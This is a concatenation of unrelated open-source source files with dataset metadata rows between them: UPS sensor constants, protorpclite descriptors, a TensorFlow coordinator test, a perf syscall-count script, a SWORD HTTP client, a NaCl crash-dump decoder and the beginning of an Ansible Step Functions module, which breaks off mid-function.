"input.frequency.nominal": [
"Nominal Input Line Frequency",
FREQUENCY_HERTZ,
"mdi:flash",
None,
],
"input.frequency.status": [
"Input Frequency Status",
"",
"mdi:information-outline",
None,
],
"output.current": ["Output Current", ELECTRICAL_CURRENT_AMPERE, "mdi:flash", None],
"output.current.nominal": [
"Nominal Output Current",
ELECTRICAL_CURRENT_AMPERE,
"mdi:flash",
None,
],
"output.voltage": ["Output Voltage", VOLT, "mdi:flash", None],
"output.voltage.nominal": ["Nominal Output Voltage", VOLT, "mdi:flash", None],
"output.frequency": ["Output Frequency", FREQUENCY_HERTZ, "mdi:flash", None],
"output.frequency.nominal": [
"Nominal Output Frequency",
FREQUENCY_HERTZ,
"mdi:flash",
None,
],
}
STATE_TYPES = {
"OL": "Online",
"OB": "On Battery",
"LB": "Low Battery",
"HB": "High Battery",
"RB": "Battery Needs Replaced",
"CHRG": "Battery Charging",
"DISCHRG": "Battery Discharging",
"BYPASS": "Bypass Active",
"CAL": "Runtime Calibration",
"OFF": "Offline",
"OVER": "Overloaded",
"TRIM": "Trimming Voltage",
"BOOST": "Boosting Voltage",
"FSD": "Forced Shutdown",
"ALARM": "Alarm",
}
SENSOR_NAME = 0
SENSOR_UNIT = 1
SENSOR_ICON = 2
SENSOR_DEVICE_CLASS = 3
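# A minimal lookup sketch (not part of the original module), showing how the
# SENSOR_* indices above address the SENSOR_TYPES entries:
#
#     info = SENSOR_TYPES["battery.charge"]
#     name = info[SENSOR_NAME]                  # "Battery Charge"
#     unit = info[SENSOR_UNIT]                  # PERCENTAGE
#     device_class = info[SENSOR_DEVICE_CLASS]  # DEVICE_CLASS_BATTERY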
| apache-2.0 | -6,297,612,210,622,498,000 | 31.272727 | 87 | 0.590141 | false |
Sorsly/subtle | google-cloud-sdk/lib/third_party/apitools/base/protorpclite/descriptor.py | 6 | 19700 | #!/usr/bin/env python
#
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Services descriptor definitions.
Contains message definitions and functions for converting
service classes into transmittable message format.
Describing an Enum instance, Enum class, Field class or Message class will
generate an appropriate descriptor object that describes that class.
This message can itself be used to transmit information to clients wishing
to know the description of an enum value, enum, field or message without
needing to download the source code. This format is also compatible with
other, non-Python languages.
The descriptors are modeled to be binary compatible with
https://github.com/google/protobuf
NOTE: The names of types and fields are not always the same between these
descriptors and the ones defined in descriptor.proto. This was done in order
to make source code files that use these descriptors easier to read. For
example, it is not necessary to prefix TYPE to all the values in
FieldDescriptor.Variant as is done in descriptor.proto
FieldDescriptorProto.Type.
Example:
class Pixel(messages.Message):
x = messages.IntegerField(1, required=True)
y = messages.IntegerField(2, required=True)
color = messages.BytesField(3)
# Describe Pixel class using message descriptor.
fields = []
field = FieldDescriptor()
field.name = 'x'
field.number = 1
field.label = FieldDescriptor.Label.REQUIRED
field.variant = FieldDescriptor.Variant.INT64
fields.append(field)
field = FieldDescriptor()
field.name = 'y'
field.number = 2
field.label = FieldDescriptor.Label.REQUIRED
field.variant = FieldDescriptor.Variant.INT64
fields.append(field)
field = FieldDescriptor()
field.name = 'color'
field.number = 3
field.label = FieldDescriptor.Label.OPTIONAL
field.variant = FieldDescriptor.Variant.BYTES
fields.append(field)
message = MessageDescriptor()
message.name = 'Pixel'
message.fields = fields
# Describing is the equivalent of building the above message.
message == describe_message(Pixel)
Public Classes:
EnumValueDescriptor: Describes Enum values.
EnumDescriptor: Describes Enum classes.
FieldDescriptor: Describes field instances.
FileDescriptor: Describes a single 'file' unit.
FileSet: Describes a collection of file descriptors.
MessageDescriptor: Describes Message classes.
Public Functions:
describe_enum_value: Describe an individual enum-value.
describe_enum: Describe an Enum class.
describe_field: Describe a Field definition.
describe_file: Describe a 'file' unit from a Python module or object.
describe_file_set: Describe a file set from a list of modules or objects.
describe_message: Describe a Message definition.
"""
import codecs
import types
import six
from apitools.base.protorpclite import messages
from apitools.base.protorpclite import util
__all__ = [
'EnumDescriptor',
'EnumValueDescriptor',
'FieldDescriptor',
'MessageDescriptor',
'FileDescriptor',
'FileSet',
'DescriptorLibrary',
'describe_enum',
'describe_enum_value',
'describe_field',
'describe_message',
'describe_file',
'describe_file_set',
'describe',
'import_descriptor_loader',
]
# NOTE: MessageField is missing because message fields cannot have
# a default value at this time.
# TODO(user): Support default message values.
#
# Map to functions that convert default values of fields of a given type
# to a string. The function must return a value that is compatible with
# FieldDescriptor.default_value and therefore a unicode string.
_DEFAULT_TO_STRING_MAP = {
messages.IntegerField: six.text_type,
messages.FloatField: six.text_type,
messages.BooleanField: lambda value: value and u'true' or u'false',
messages.BytesField: lambda value: codecs.escape_encode(value)[0],
messages.StringField: lambda value: value,
messages.EnumField: lambda value: six.text_type(value.number),
}
_DEFAULT_FROM_STRING_MAP = {
messages.IntegerField: int,
messages.FloatField: float,
messages.BooleanField: lambda value: value == u'true',
messages.BytesField: lambda value: codecs.escape_decode(value)[0],
messages.StringField: lambda value: value,
messages.EnumField: int,
}
class EnumValueDescriptor(messages.Message):
"""Enum value descriptor.
Fields:
name: Name of enumeration value.
number: Number of enumeration value.
"""
# TODO(user): Why are these listed as optional in descriptor.proto.
# Harmonize?
name = messages.StringField(1, required=True)
number = messages.IntegerField(2,
required=True,
variant=messages.Variant.INT32)
class EnumDescriptor(messages.Message):
"""Enum class descriptor.
Fields:
name: Name of Enum without any qualification.
values: Values defined by Enum class.
"""
name = messages.StringField(1)
values = messages.MessageField(EnumValueDescriptor, 2, repeated=True)
class FieldDescriptor(messages.Message):
"""Field definition descriptor.
Enums:
Variant: Wire format hint sub-types for field.
Label: Values for optional, required and repeated fields.
Fields:
name: Name of field.
number: Number of field.
variant: Variant of field.
type_name: Type name for message and enum fields.
default_value: String representation of default value.
"""
Variant = messages.Variant # pylint:disable=invalid-name
class Label(messages.Enum):
"""Field label."""
OPTIONAL = 1
REQUIRED = 2
REPEATED = 3
name = messages.StringField(1, required=True)
number = messages.IntegerField(3,
required=True,
variant=messages.Variant.INT32)
label = messages.EnumField(Label, 4, default=Label.OPTIONAL)
variant = messages.EnumField(Variant, 5)
type_name = messages.StringField(6)
# For numeric types, contains the original text representation of
# the value.
# For booleans, "true" or "false".
# For strings, contains the default text contents (not escaped in any
# way).
# For bytes, contains the C escaped value. All bytes < 128 are that are
# traditionally considered unprintable are also escaped.
default_value = messages.StringField(7)
class MessageDescriptor(messages.Message):
"""Message definition descriptor.
Fields:
name: Name of Message without any qualification.
fields: Fields defined for message.
message_types: Nested Message classes defined on message.
enum_types: Nested Enum classes defined on message.
"""
name = messages.StringField(1)
fields = messages.MessageField(FieldDescriptor, 2, repeated=True)
message_types = messages.MessageField(
'apitools.base.protorpclite.descriptor.MessageDescriptor', 3,
repeated=True)
enum_types = messages.MessageField(EnumDescriptor, 4, repeated=True)
class FileDescriptor(messages.Message):
"""Description of file containing protobuf definitions.
Fields:
package: Fully qualified name of package that definitions belong to.
message_types: Message definitions contained in file.
enum_types: Enum definitions contained in file.
"""
package = messages.StringField(2)
# TODO(user): Add dependency field
message_types = messages.MessageField(MessageDescriptor, 4, repeated=True)
enum_types = messages.MessageField(EnumDescriptor, 5, repeated=True)
class FileSet(messages.Message):
"""A collection of FileDescriptors.
Fields:
files: Files in file-set.
"""
files = messages.MessageField(FileDescriptor, 1, repeated=True)
def describe_enum_value(enum_value):
"""Build descriptor for Enum instance.
Args:
enum_value: Enum value to provide descriptor for.
Returns:
Initialized EnumValueDescriptor instance describing the Enum instance.
"""
enum_value_descriptor = EnumValueDescriptor()
enum_value_descriptor.name = six.text_type(enum_value.name)
enum_value_descriptor.number = enum_value.number
return enum_value_descriptor
def describe_enum(enum_definition):
"""Build descriptor for Enum class.
Args:
enum_definition: Enum class to provide descriptor for.
Returns:
Initialized EnumDescriptor instance describing the Enum class.
"""
enum_descriptor = EnumDescriptor()
enum_descriptor.name = enum_definition.definition_name().split('.')[-1]
values = []
for number in enum_definition.numbers():
value = enum_definition.lookup_by_number(number)
values.append(describe_enum_value(value))
if values:
enum_descriptor.values = values
return enum_descriptor
def describe_field(field_definition):
"""Build descriptor for Field instance.
Args:
field_definition: Field instance to provide descriptor for.
Returns:
Initialized FieldDescriptor instance describing the Field instance.
"""
field_descriptor = FieldDescriptor()
field_descriptor.name = field_definition.name
field_descriptor.number = field_definition.number
field_descriptor.variant = field_definition.variant
if isinstance(field_definition, messages.EnumField):
field_descriptor.type_name = field_definition.type.definition_name()
if isinstance(field_definition, messages.MessageField):
field_descriptor.type_name = (
field_definition.message_type.definition_name())
if field_definition.default is not None:
field_descriptor.default_value = _DEFAULT_TO_STRING_MAP[
type(field_definition)](field_definition.default)
# Set label.
if field_definition.repeated:
field_descriptor.label = FieldDescriptor.Label.REPEATED
elif field_definition.required:
field_descriptor.label = FieldDescriptor.Label.REQUIRED
else:
field_descriptor.label = FieldDescriptor.Label.OPTIONAL
return field_descriptor
def describe_message(message_definition):
"""Build descriptor for Message class.
Args:
message_definition: Message class to provide descriptor for.
Returns:
Initialized MessageDescriptor instance describing the Message class.
"""
message_descriptor = MessageDescriptor()
message_descriptor.name = message_definition.definition_name().split(
'.')[-1]
fields = sorted(message_definition.all_fields(),
key=lambda v: v.number)
if fields:
message_descriptor.fields = [describe_field(field) for field in fields]
try:
nested_messages = message_definition.__messages__
except AttributeError:
pass
else:
message_descriptors = []
for name in nested_messages:
value = getattr(message_definition, name)
message_descriptors.append(describe_message(value))
message_descriptor.message_types = message_descriptors
try:
nested_enums = message_definition.__enums__
except AttributeError:
pass
else:
enum_descriptors = []
for name in nested_enums:
value = getattr(message_definition, name)
enum_descriptors.append(describe_enum(value))
message_descriptor.enum_types = enum_descriptors
return message_descriptor
def describe_file(module):
"""Build a file from a specified Python module.
Args:
module: Python module to describe.
Returns:
Initialized FileDescriptor instance describing the module.
"""
descriptor = FileDescriptor()
descriptor.package = util.get_package_for_module(module)
if not descriptor.package:
descriptor.package = None
message_descriptors = []
enum_descriptors = []
# Need to iterate over all top level attributes of the module looking for
# message and enum definitions. Each definition must be itself described.
for name in sorted(dir(module)):
value = getattr(module, name)
if isinstance(value, type):
if issubclass(value, messages.Message):
message_descriptors.append(describe_message(value))
elif issubclass(value, messages.Enum):
enum_descriptors.append(describe_enum(value))
if message_descriptors:
descriptor.message_types = message_descriptors
if enum_descriptors:
descriptor.enum_types = enum_descriptors
return descriptor
def describe_file_set(modules):
"""Build a file set from a specified Python modules.
Args:
modules: Iterable of Python module to describe.
Returns:
Initialized FileSet instance describing the modules.
"""
descriptor = FileSet()
file_descriptors = []
for module in modules:
file_descriptors.append(describe_file(module))
if file_descriptors:
descriptor.files = file_descriptors
return descriptor
def describe(value):
"""Describe any value as a descriptor.
Helper function for describing any object with an appropriate descriptor
object.
Args:
value: Value to describe as a descriptor.
Returns:
Descriptor message class if object is describable as a descriptor, else
None.
"""
if isinstance(value, types.ModuleType):
return describe_file(value)
elif isinstance(value, messages.Field):
return describe_field(value)
elif isinstance(value, messages.Enum):
return describe_enum_value(value)
elif isinstance(value, type):
if issubclass(value, messages.Message):
return describe_message(value)
elif issubclass(value, messages.Enum):
return describe_enum(value)
return None
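# A minimal usage sketch (not part of the original module): describing a
# hypothetical message class with the helpers above.
#
#     class Pixel(messages.Message):
#         x = messages.IntegerField(1, required=True)
#
#     descriptor = describe(Pixel)  # returns a MessageDescriptor
#     assert descriptor.fields[0].name == 'x'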
@util.positional(1)
def import_descriptor_loader(definition_name, importer=__import__):
"""Find objects by importing modules as needed.
A definition loader is a function that resolves a definition name to a
descriptor.
The import finder resolves definitions to their names by importing modules
when necessary.
Args:
definition_name: Name of definition to find.
importer: Import function used for importing new modules.
Returns:
Appropriate descriptor for any describable type located by name.
Raises:
DefinitionNotFoundError when a name does not refer to either a definition
or a module.
"""
# Attempt to import descriptor as a module.
if definition_name.startswith('.'):
definition_name = definition_name[1:]
if not definition_name.startswith('.'):
leaf = definition_name.split('.')[-1]
if definition_name:
try:
module = importer(definition_name, '', '', [leaf])
except ImportError:
pass
else:
return describe(module)
try:
# Attempt to use messages.find_definition to find item.
return describe(messages.find_definition(definition_name,
importer=__import__))
except messages.DefinitionNotFoundError as err:
# There are things that find_definition will not find, but if
# the parent is loaded, its children can be searched for a
# match.
split_name = definition_name.rsplit('.', 1)
if len(split_name) > 1:
parent, child = split_name
try:
parent_definition = import_descriptor_loader(
parent, importer=importer)
except messages.DefinitionNotFoundError:
# Fall through to original error.
pass
else:
# Check the parent definition for a matching descriptor.
if isinstance(parent_definition, EnumDescriptor):
search_list = parent_definition.values or []
elif isinstance(parent_definition, MessageDescriptor):
search_list = parent_definition.fields or []
else:
search_list = []
for definition in search_list:
if definition.name == child:
return definition
# Still didn't find. Reraise original exception.
raise err
class DescriptorLibrary(object):
"""A descriptor library is an object that contains known definitions.
A descriptor library contains a cache of descriptor objects mapped by
definition name. It contains all types of descriptors except for
file sets.
When a definition name is requested that the library does not know about
it can be provided with a descriptor loader which attempt to resolve the
missing descriptor.
"""
@util.positional(1)
def __init__(self,
descriptors=None,
descriptor_loader=import_descriptor_loader):
"""Constructor.
Args:
descriptors: A dictionary or dictionary-like object that can be used
to store and cache descriptors by definition name.
          descriptor_loader: A function used for resolving missing descriptors.
The function takes a definition name as its parameter and returns
an appropriate descriptor. It may raise DefinitionNotFoundError.
"""
self.__descriptor_loader = descriptor_loader
self.__descriptors = descriptors or {}
def lookup_descriptor(self, definition_name):
"""Lookup descriptor by name.
Get descriptor from library by name. If descriptor is not found will
attempt to find via descriptor loader if provided.
Args:
definition_name: Definition name to find.
Returns:
Descriptor that describes definition name.
Raises:
          DefinitionNotFoundError if no descriptor exists for definition name.
"""
try:
return self.__descriptors[definition_name]
except KeyError:
pass
if self.__descriptor_loader:
definition = self.__descriptor_loader(definition_name)
self.__descriptors[definition_name] = definition
return definition
else:
raise messages.DefinitionNotFoundError(
'Could not find definition for %s' % definition_name)
def lookup_package(self, definition_name):
"""Determines the package name for any definition.
Determine the package that any definition name belongs to. May
check parent for package name and will resolve missing
descriptors if provided descriptor loader.
Args:
definition_name: Definition name to find package for.
"""
while True:
descriptor = self.lookup_descriptor(definition_name)
if isinstance(descriptor, FileDescriptor):
return descriptor.package
else:
index = definition_name.rfind('.')
if index < 0:
return None
definition_name = definition_name[:index]
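# A minimal usage sketch (not part of the original module); the definition
# name is hypothetical:
#
#     library = DescriptorLibrary()
#     descriptor = library.lookup_descriptor('my_package.MyMessage')
#     package = library.lookup_package('my_package.MyMessage')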
| mit | -7,551,161,985,702,244,000 | 31.03252 | 79 | 0.67802 | false |
teamacid/android_kernel_teamacid | tools/perf/scripts/python/syscall-counts.py | 944 | 1429 | # system call counts
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
usage = "perf trace -s syscall-counts.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
pass
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40d %10d\n" % (id, val),
| gpl-2.0 | -3,290,188,331,221,186,000 | 23.637931 | 77 | 0.611617 | false |
JiscPER/magnificent-octopus | octopus/modules/swordv2/client_http.py | 1 | 1816 | from sword2 import HttpLayer, HttpResponse
from octopus.lib import http
import json
from requests.auth import HTTPBasicAuth
class OctopusHttpResponse(HttpResponse):
def __init__(self, *args, **kwargs):
self.resp = None
if len(args) > 0:
self.resp = args[0]
def __getitem__(self, att):
return self.get(att)
def __repr__(self):
return self.resp.__repr__()
@property
def status(self):
if self.resp is None:
return 408 # timeout
return self.resp.status_code
def get(self, att, default=None):
if att == "status":
return self.status
if self.resp is None:
return default
return self.resp.headers.get(att, default)
def keys(self):
return self.resp.headers.keys()
class OctopusHttpLayer(HttpLayer):
def __init__(self, *args, **kwargs):
self.username = None
self.password = None
self.auth = None
def add_credentials(self, username, password):
self.username = username
self.password = password
self.auth = HTTPBasicAuth(username, password)
def request(self, uri, method, headers=None, payload=None): # Note that body can be file-like
resp = None
if method == "GET":
resp = http.get(uri, headers=headers, auth=self.auth)
elif method == "POST":
resp = http.post(uri, headers=headers, data=payload, auth=self.auth)
elif method == "PUT":
resp = http.put(uri, headers=headers, data=payload, auth=self.auth)
elif method == "DELETE":
resp = http.delete(uri, headers=headers, auth=self.auth)
if resp is None:
return OctopusHttpResponse(), u""
return OctopusHttpResponse(resp), resp.text
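# A minimal usage sketch (not part of the original module); the URL and
# credentials are illustrative only:
#
#     layer = OctopusHttpLayer()
#     layer.add_credentials("user", "pass")
#     resp, body = layer.request("https://example.com/sword2/endpoint", "GET")
#     # resp.status is the HTTP status code, or 408 if the request timed out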
| apache-2.0 | 6,734,626,440,960,297,000 | 29.266667 | 100 | 0.59967 | false |
awni/tensorflow | tensorflow/python/training/coordinator_test.py | 6 | 4200 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import threading
import time
import tensorflow as tf
def StopInN(coord, n_secs):
time.sleep(n_secs)
coord.request_stop()
def RaiseInN(coord, n_secs, ex, report_exception):
try:
time.sleep(n_secs)
raise ex
except RuntimeError as e:
if report_exception:
coord.request_stop(e)
else:
coord.request_stop(sys.exc_info())
def RaiseInNUsingContextHandler(coord, n_secs, ex):
with coord.stop_on_exception():
time.sleep(n_secs)
raise ex
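# A minimal sketch (not part of the original tests) of the pattern the helper
# above exercises: an exception raised inside coord.stop_on_exception() is
# reported to the coordinator and re-raised by coord.join() in the main thread.
#
#     coord = tf.train.Coordinator()
#     with coord.stop_on_exception():
#       do_work()  # hypothetical worker body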
def SleepABit(n_secs):
time.sleep(n_secs)
class CoordinatorTest(tf.test.TestCase):
def testStopAPI(self):
coord = tf.train.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
coord.request_stop()
self.assertTrue(coord.should_stop())
self.assertTrue(coord.wait_for_stop(0.01))
def testStopAsync(self):
coord = tf.train.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.1))
threading.Thread(target=StopInN, args=(coord, 0.02)).start()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
self.assertTrue(coord.wait_for_stop(0.03))
self.assertTrue(coord.should_stop())
def testJoin(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01,)),
threading.Thread(target=SleepABit, args=(0.02,)),
threading.Thread(target=SleepABit, args=(0.01,))]
for t in threads:
t.start()
coord.join(threads)
def testJoinGraceExpires(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=StopInN, args=(coord, 0.01)),
threading.Thread(target=SleepABit, args=(10.0,))]
for t in threads:
t.daemon = True
t.start()
with self.assertRaisesRegexp(RuntimeError, "threads still running"):
coord.join(threads, stop_grace_period_secs=0.02)
def testJoinRaiseReportExcInfo(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), False)),
threading.Thread(target=RaiseInN,
args=(coord, 0.02, RuntimeError("Too late"), False))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinRaiseReportException(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), True)),
threading.Thread(target=RaiseInN,
args=(coord, 0.02, RuntimeError("Too late"), True))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinRaiseReportExceptionUsingHandler(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInNUsingContextHandler,
args=(coord, 0.01, RuntimeError("First"))),
threading.Thread(target=RaiseInNUsingContextHandler,
args=(coord, 0.02, RuntimeError("Too late")))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | 5,699,396,441,109,231,000 | 30.578947 | 80 | 0.652143 | false |
fujunwei/chromium-crosswalk | native_client_sdk/src/tools/decode_dump.py | 51 | 6717 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utility to decode a crash dump generated by untrusted_crash_dump.[ch]
Currently this produces a simple stack trace.
"""
import argparse
import json
import os
import posixpath
import subprocess
import sys
class CoreDecoder(object):
"""Class to process core dumps."""
def __init__(self, main_nexe, nmf_filename,
addr2line, library_paths, platform):
"""Construct and object to process core dumps.
Args:
main_nexe: nexe to resolve NaClMain references from.
nmf_filename: nmf to resolve references from.
addr2line: path to appropriate addr2line.
library_paths: list of paths to search for libraries.
platform: platform string to use in nmf files.
"""
self.main_nexe = main_nexe
self.nmf_filename = nmf_filename
if nmf_filename == '-':
self.nmf_data = {}
else:
self.nmf_data = json.load(open(nmf_filename))
self.addr2line = addr2line
self.library_paths = library_paths
self.platform = platform
def _SelectModulePath(self, filename):
"""Select which path to get a module from.
Args:
filename: filename of a module (as appears in phdrs).
Returns:
Full local path to the file.
Derived by consulting the manifest.
"""
# For some names try the main nexe.
# NaClMain is the argv[0] setup in sel_main.c
# (null) shows up in chrome.
if self.main_nexe is not None and filename in ['NaClMain', '(null)']:
return self.main_nexe
filepart = posixpath.basename(filename)
nmf_entry = self.nmf_data.get('files', {}).get(filepart, {})
nmf_url = nmf_entry.get(self.platform, {}).get('url')
# Try filename directly if not in manifest.
if nmf_url is None:
return filename
# Look for the module relative to the manifest (if any),
# then in other search paths.
paths = []
if self.nmf_filename != '-':
paths.append(os.path.dirname(self.nmf_filename))
paths.extend(self.library_paths)
for path in paths:
pfilename = os.path.join(path, nmf_url)
if os.path.exists(pfilename):
return pfilename
# If nothing else, try the path directly.
return filename
def _DecodeAddressSegment(self, segments, address):
"""Convert an address to a segment relative one, plus filename.
Args:
segments: a list of phdr segments.
address: a process wide code address.
Returns:
A tuple of filename and segment relative address.
"""
for segment in segments:
for phdr in segment['dlpi_phdr']:
start = segment['dlpi_addr'] + phdr['p_vaddr']
end = start + phdr['p_memsz']
if address >= start and address < end:
return (segment['dlpi_name'], address - segment['dlpi_addr'])
return ('(null)', address)
def _Addr2Line(self, segments, address):
"""Use addr2line to decode a code address.
Args:
segments: A list of phdr segments.
address: a code address.
Returns:
A list of dicts containing: function, filename, lineno.
"""
filename, address = self._DecodeAddressSegment(segments, address)
filename = self._SelectModulePath(filename)
if not os.path.exists(filename):
return [{
'function': 'Unknown_function',
'filename': 'unknown_file',
'lineno': -1,
}]
# Use address - 1 to get the call site instead of the line after.
address -= 1
cmd = [
self.addr2line, '-f', '--inlines', '-e', filename, '0x%08x' % address,
]
process = subprocess.Popen(cmd, stdout=subprocess.PIPE)
process_stdout, _ = process.communicate()
assert process.returncode == 0
lines = process_stdout.splitlines()
assert len(lines) % 2 == 0
results = []
for index in xrange(len(lines) / 2):
func = lines[index * 2]
afilename, lineno = lines[index * 2 + 1].split(':', 1)
results.append({
'function': func,
'filename': afilename,
'lineno': int(lineno),
})
return results
def Decode(self, text):
core = json.loads(text)
for frame in core['frames']:
frame['scopes'] = self._Addr2Line(core['segments'], frame['prog_ctr'])
return core
def LoadAndDecode(self, core_path):
"""Given a core.json file, load and embellish with decoded addresses.
Args:
core_path: source file containing a dump.
Returns:
An embellished core dump dict (decoded code addresses).
"""
core = json.load(open(core_path))
for frame in core['frames']:
frame['scopes'] = self._Addr2Line(core['segments'], frame['prog_ctr'])
return core
def StackTrace(self, info):
"""Convert a decoded core.json dump to a simple stack trace.
Args:
info: core.json info with decoded code addresses.
Returns:
A list of dicts with filename, lineno, function (deepest first).
"""
trace = []
for frame in info['frames']:
for scope in frame['scopes']:
trace.append(scope)
return trace
def PrintTrace(self, trace, out):
"""Print a trace to a file like object.
Args:
trace: A list of [filename, lineno, function] (deepest first).
out: file like object to output the trace to.
"""
for scope in trace:
out.write('%s at %s:%d\n' % (
scope['function'],
scope['filename'],
scope['lineno']))
def main(args):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-m', '--main-nexe',
help='nexe to resolve NaClMain references from')
parser.add_argument('-n', '--nmf', default='-',
help='nmf to resolve references from')
parser.add_argument('-a', '--addr2line',
help='path to appropriate addr2line')
parser.add_argument('-L', '--library-path', dest='library_paths',
action='append', default=[],
help='path to search for shared libraries')
parser.add_argument('-p', '--platform',
help='platform in a style match nmf files')
parser.add_argument('core_json')
options = parser.parse_args(args)
decoder = CoreDecoder(
main_nexe=options.main_nexe,
nmf_filename=options.nmf,
addr2line=options.addr2line,
library_paths=options.library_paths,
platform=options.platform)
info = decoder.LoadAndDecode(options.core_json)
trace = decoder.StackTrace(info)
decoder.PrintTrace(trace, sys.stdout)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
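# A minimal invocation sketch (not part of the original tool), using the flags
# defined in main(); paths and the platform value are illustrative only:
#
#     decode_dump.py -m main.nexe -n app.nmf -a /path/to/addr2line \
#         -p x86-64 core.json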
| bsd-3-clause | -2,393,938,606,953,182,700 | 31.606796 | 78 | 0.630043 | false |
apollo13/ansible | test/support/integration/plugins/modules/aws_step_functions_state_machine_execution.py | 27 | 6479 | #!/usr/bin/python
# Copyright (c) 2019, Prasad Katti (@prasadkatti)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: aws_step_functions_state_machine_execution
short_description: Start or stop execution of an AWS Step Functions state machine.
version_added: "2.10"
description:
- Start or stop execution of a state machine in AWS Step Functions.
options:
action:
description: Desired action (start or stop) for a state machine execution.
default: start
choices: [ start, stop ]
type: str
name:
description: Name of the execution.
type: str
execution_input:
description: The JSON input data for the execution.
type: json
default: {}
state_machine_arn:
description: The ARN of the state machine that will be executed.
type: str
execution_arn:
description: The ARN of the execution you wish to stop.
type: str
cause:
description: A detailed explanation of the cause for stopping the execution.
type: str
default: ''
error:
description: The error code of the failure to pass in when stopping the execution.
type: str
default: ''
extends_documentation_fragment:
- aws
- ec2
author:
- Prasad Katti (@prasadkatti)
'''
EXAMPLES = '''
- name: Start an execution of a state machine
aws_step_functions_state_machine_execution:
name: an_execution_name
execution_input: '{ "IsHelloWorldExample": true }'
state_machine_arn: "arn:aws:states:us-west-2:682285639423:stateMachine:HelloWorldStateMachine"
- name: Stop an execution of a state machine
aws_step_functions_state_machine_execution:
action: stop
execution_arn: "arn:aws:states:us-west-2:682285639423:execution:HelloWorldStateMachineCopy:a1e8e2b5-5dfe-d40e-d9e3-6201061047c8"
cause: "cause of task failure"
error: "error code of the failure"
'''
RETURN = '''
execution_arn:
description: ARN of the AWS Step Functions state machine execution.
type: str
returned: if action == start and changed == True
sample: "arn:aws:states:us-west-2:682285639423:execution:HelloWorldStateMachineCopy:a1e8e2b5-5dfe-d40e-d9e3-6201061047c8"
start_date:
description: The date the execution is started.
type: str
returned: if action == start and changed == True
sample: "2019-11-02T22:39:49.071000-07:00"
stop_date:
description: The date the execution is stopped.
type: str
returned: if action == stop
sample: "2019-11-02T22:39:49.071000-07:00"
'''
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import camel_dict_to_snake_dict
try:
from botocore.exceptions import ClientError, BotoCoreError
except ImportError:
pass # caught by AnsibleAWSModule
def start_execution(module, sfn_client):
'''
    start_execution uses the execution name to determine whether a previous execution already exists.
    If an execution by the provided name exists, client.start_execution will not be called.
'''
state_machine_arn = module.params.get('state_machine_arn')
name = module.params.get('name')
execution_input = module.params.get('execution_input')
try:
# list_executions is eventually consistent
page_iterators = sfn_client.get_paginator('list_executions').paginate(stateMachineArn=state_machine_arn)
for execution in page_iterators.build_full_result()['executions']:
if name == execution['name']:
check_mode(module, msg='State machine execution already exists.', changed=False)
module.exit_json(changed=False)
check_mode(module, msg='State machine execution would be started.', changed=True)
res_execution = sfn_client.start_execution(
stateMachineArn=state_machine_arn,
name=name,
input=execution_input
)
except (ClientError, BotoCoreError) as e:
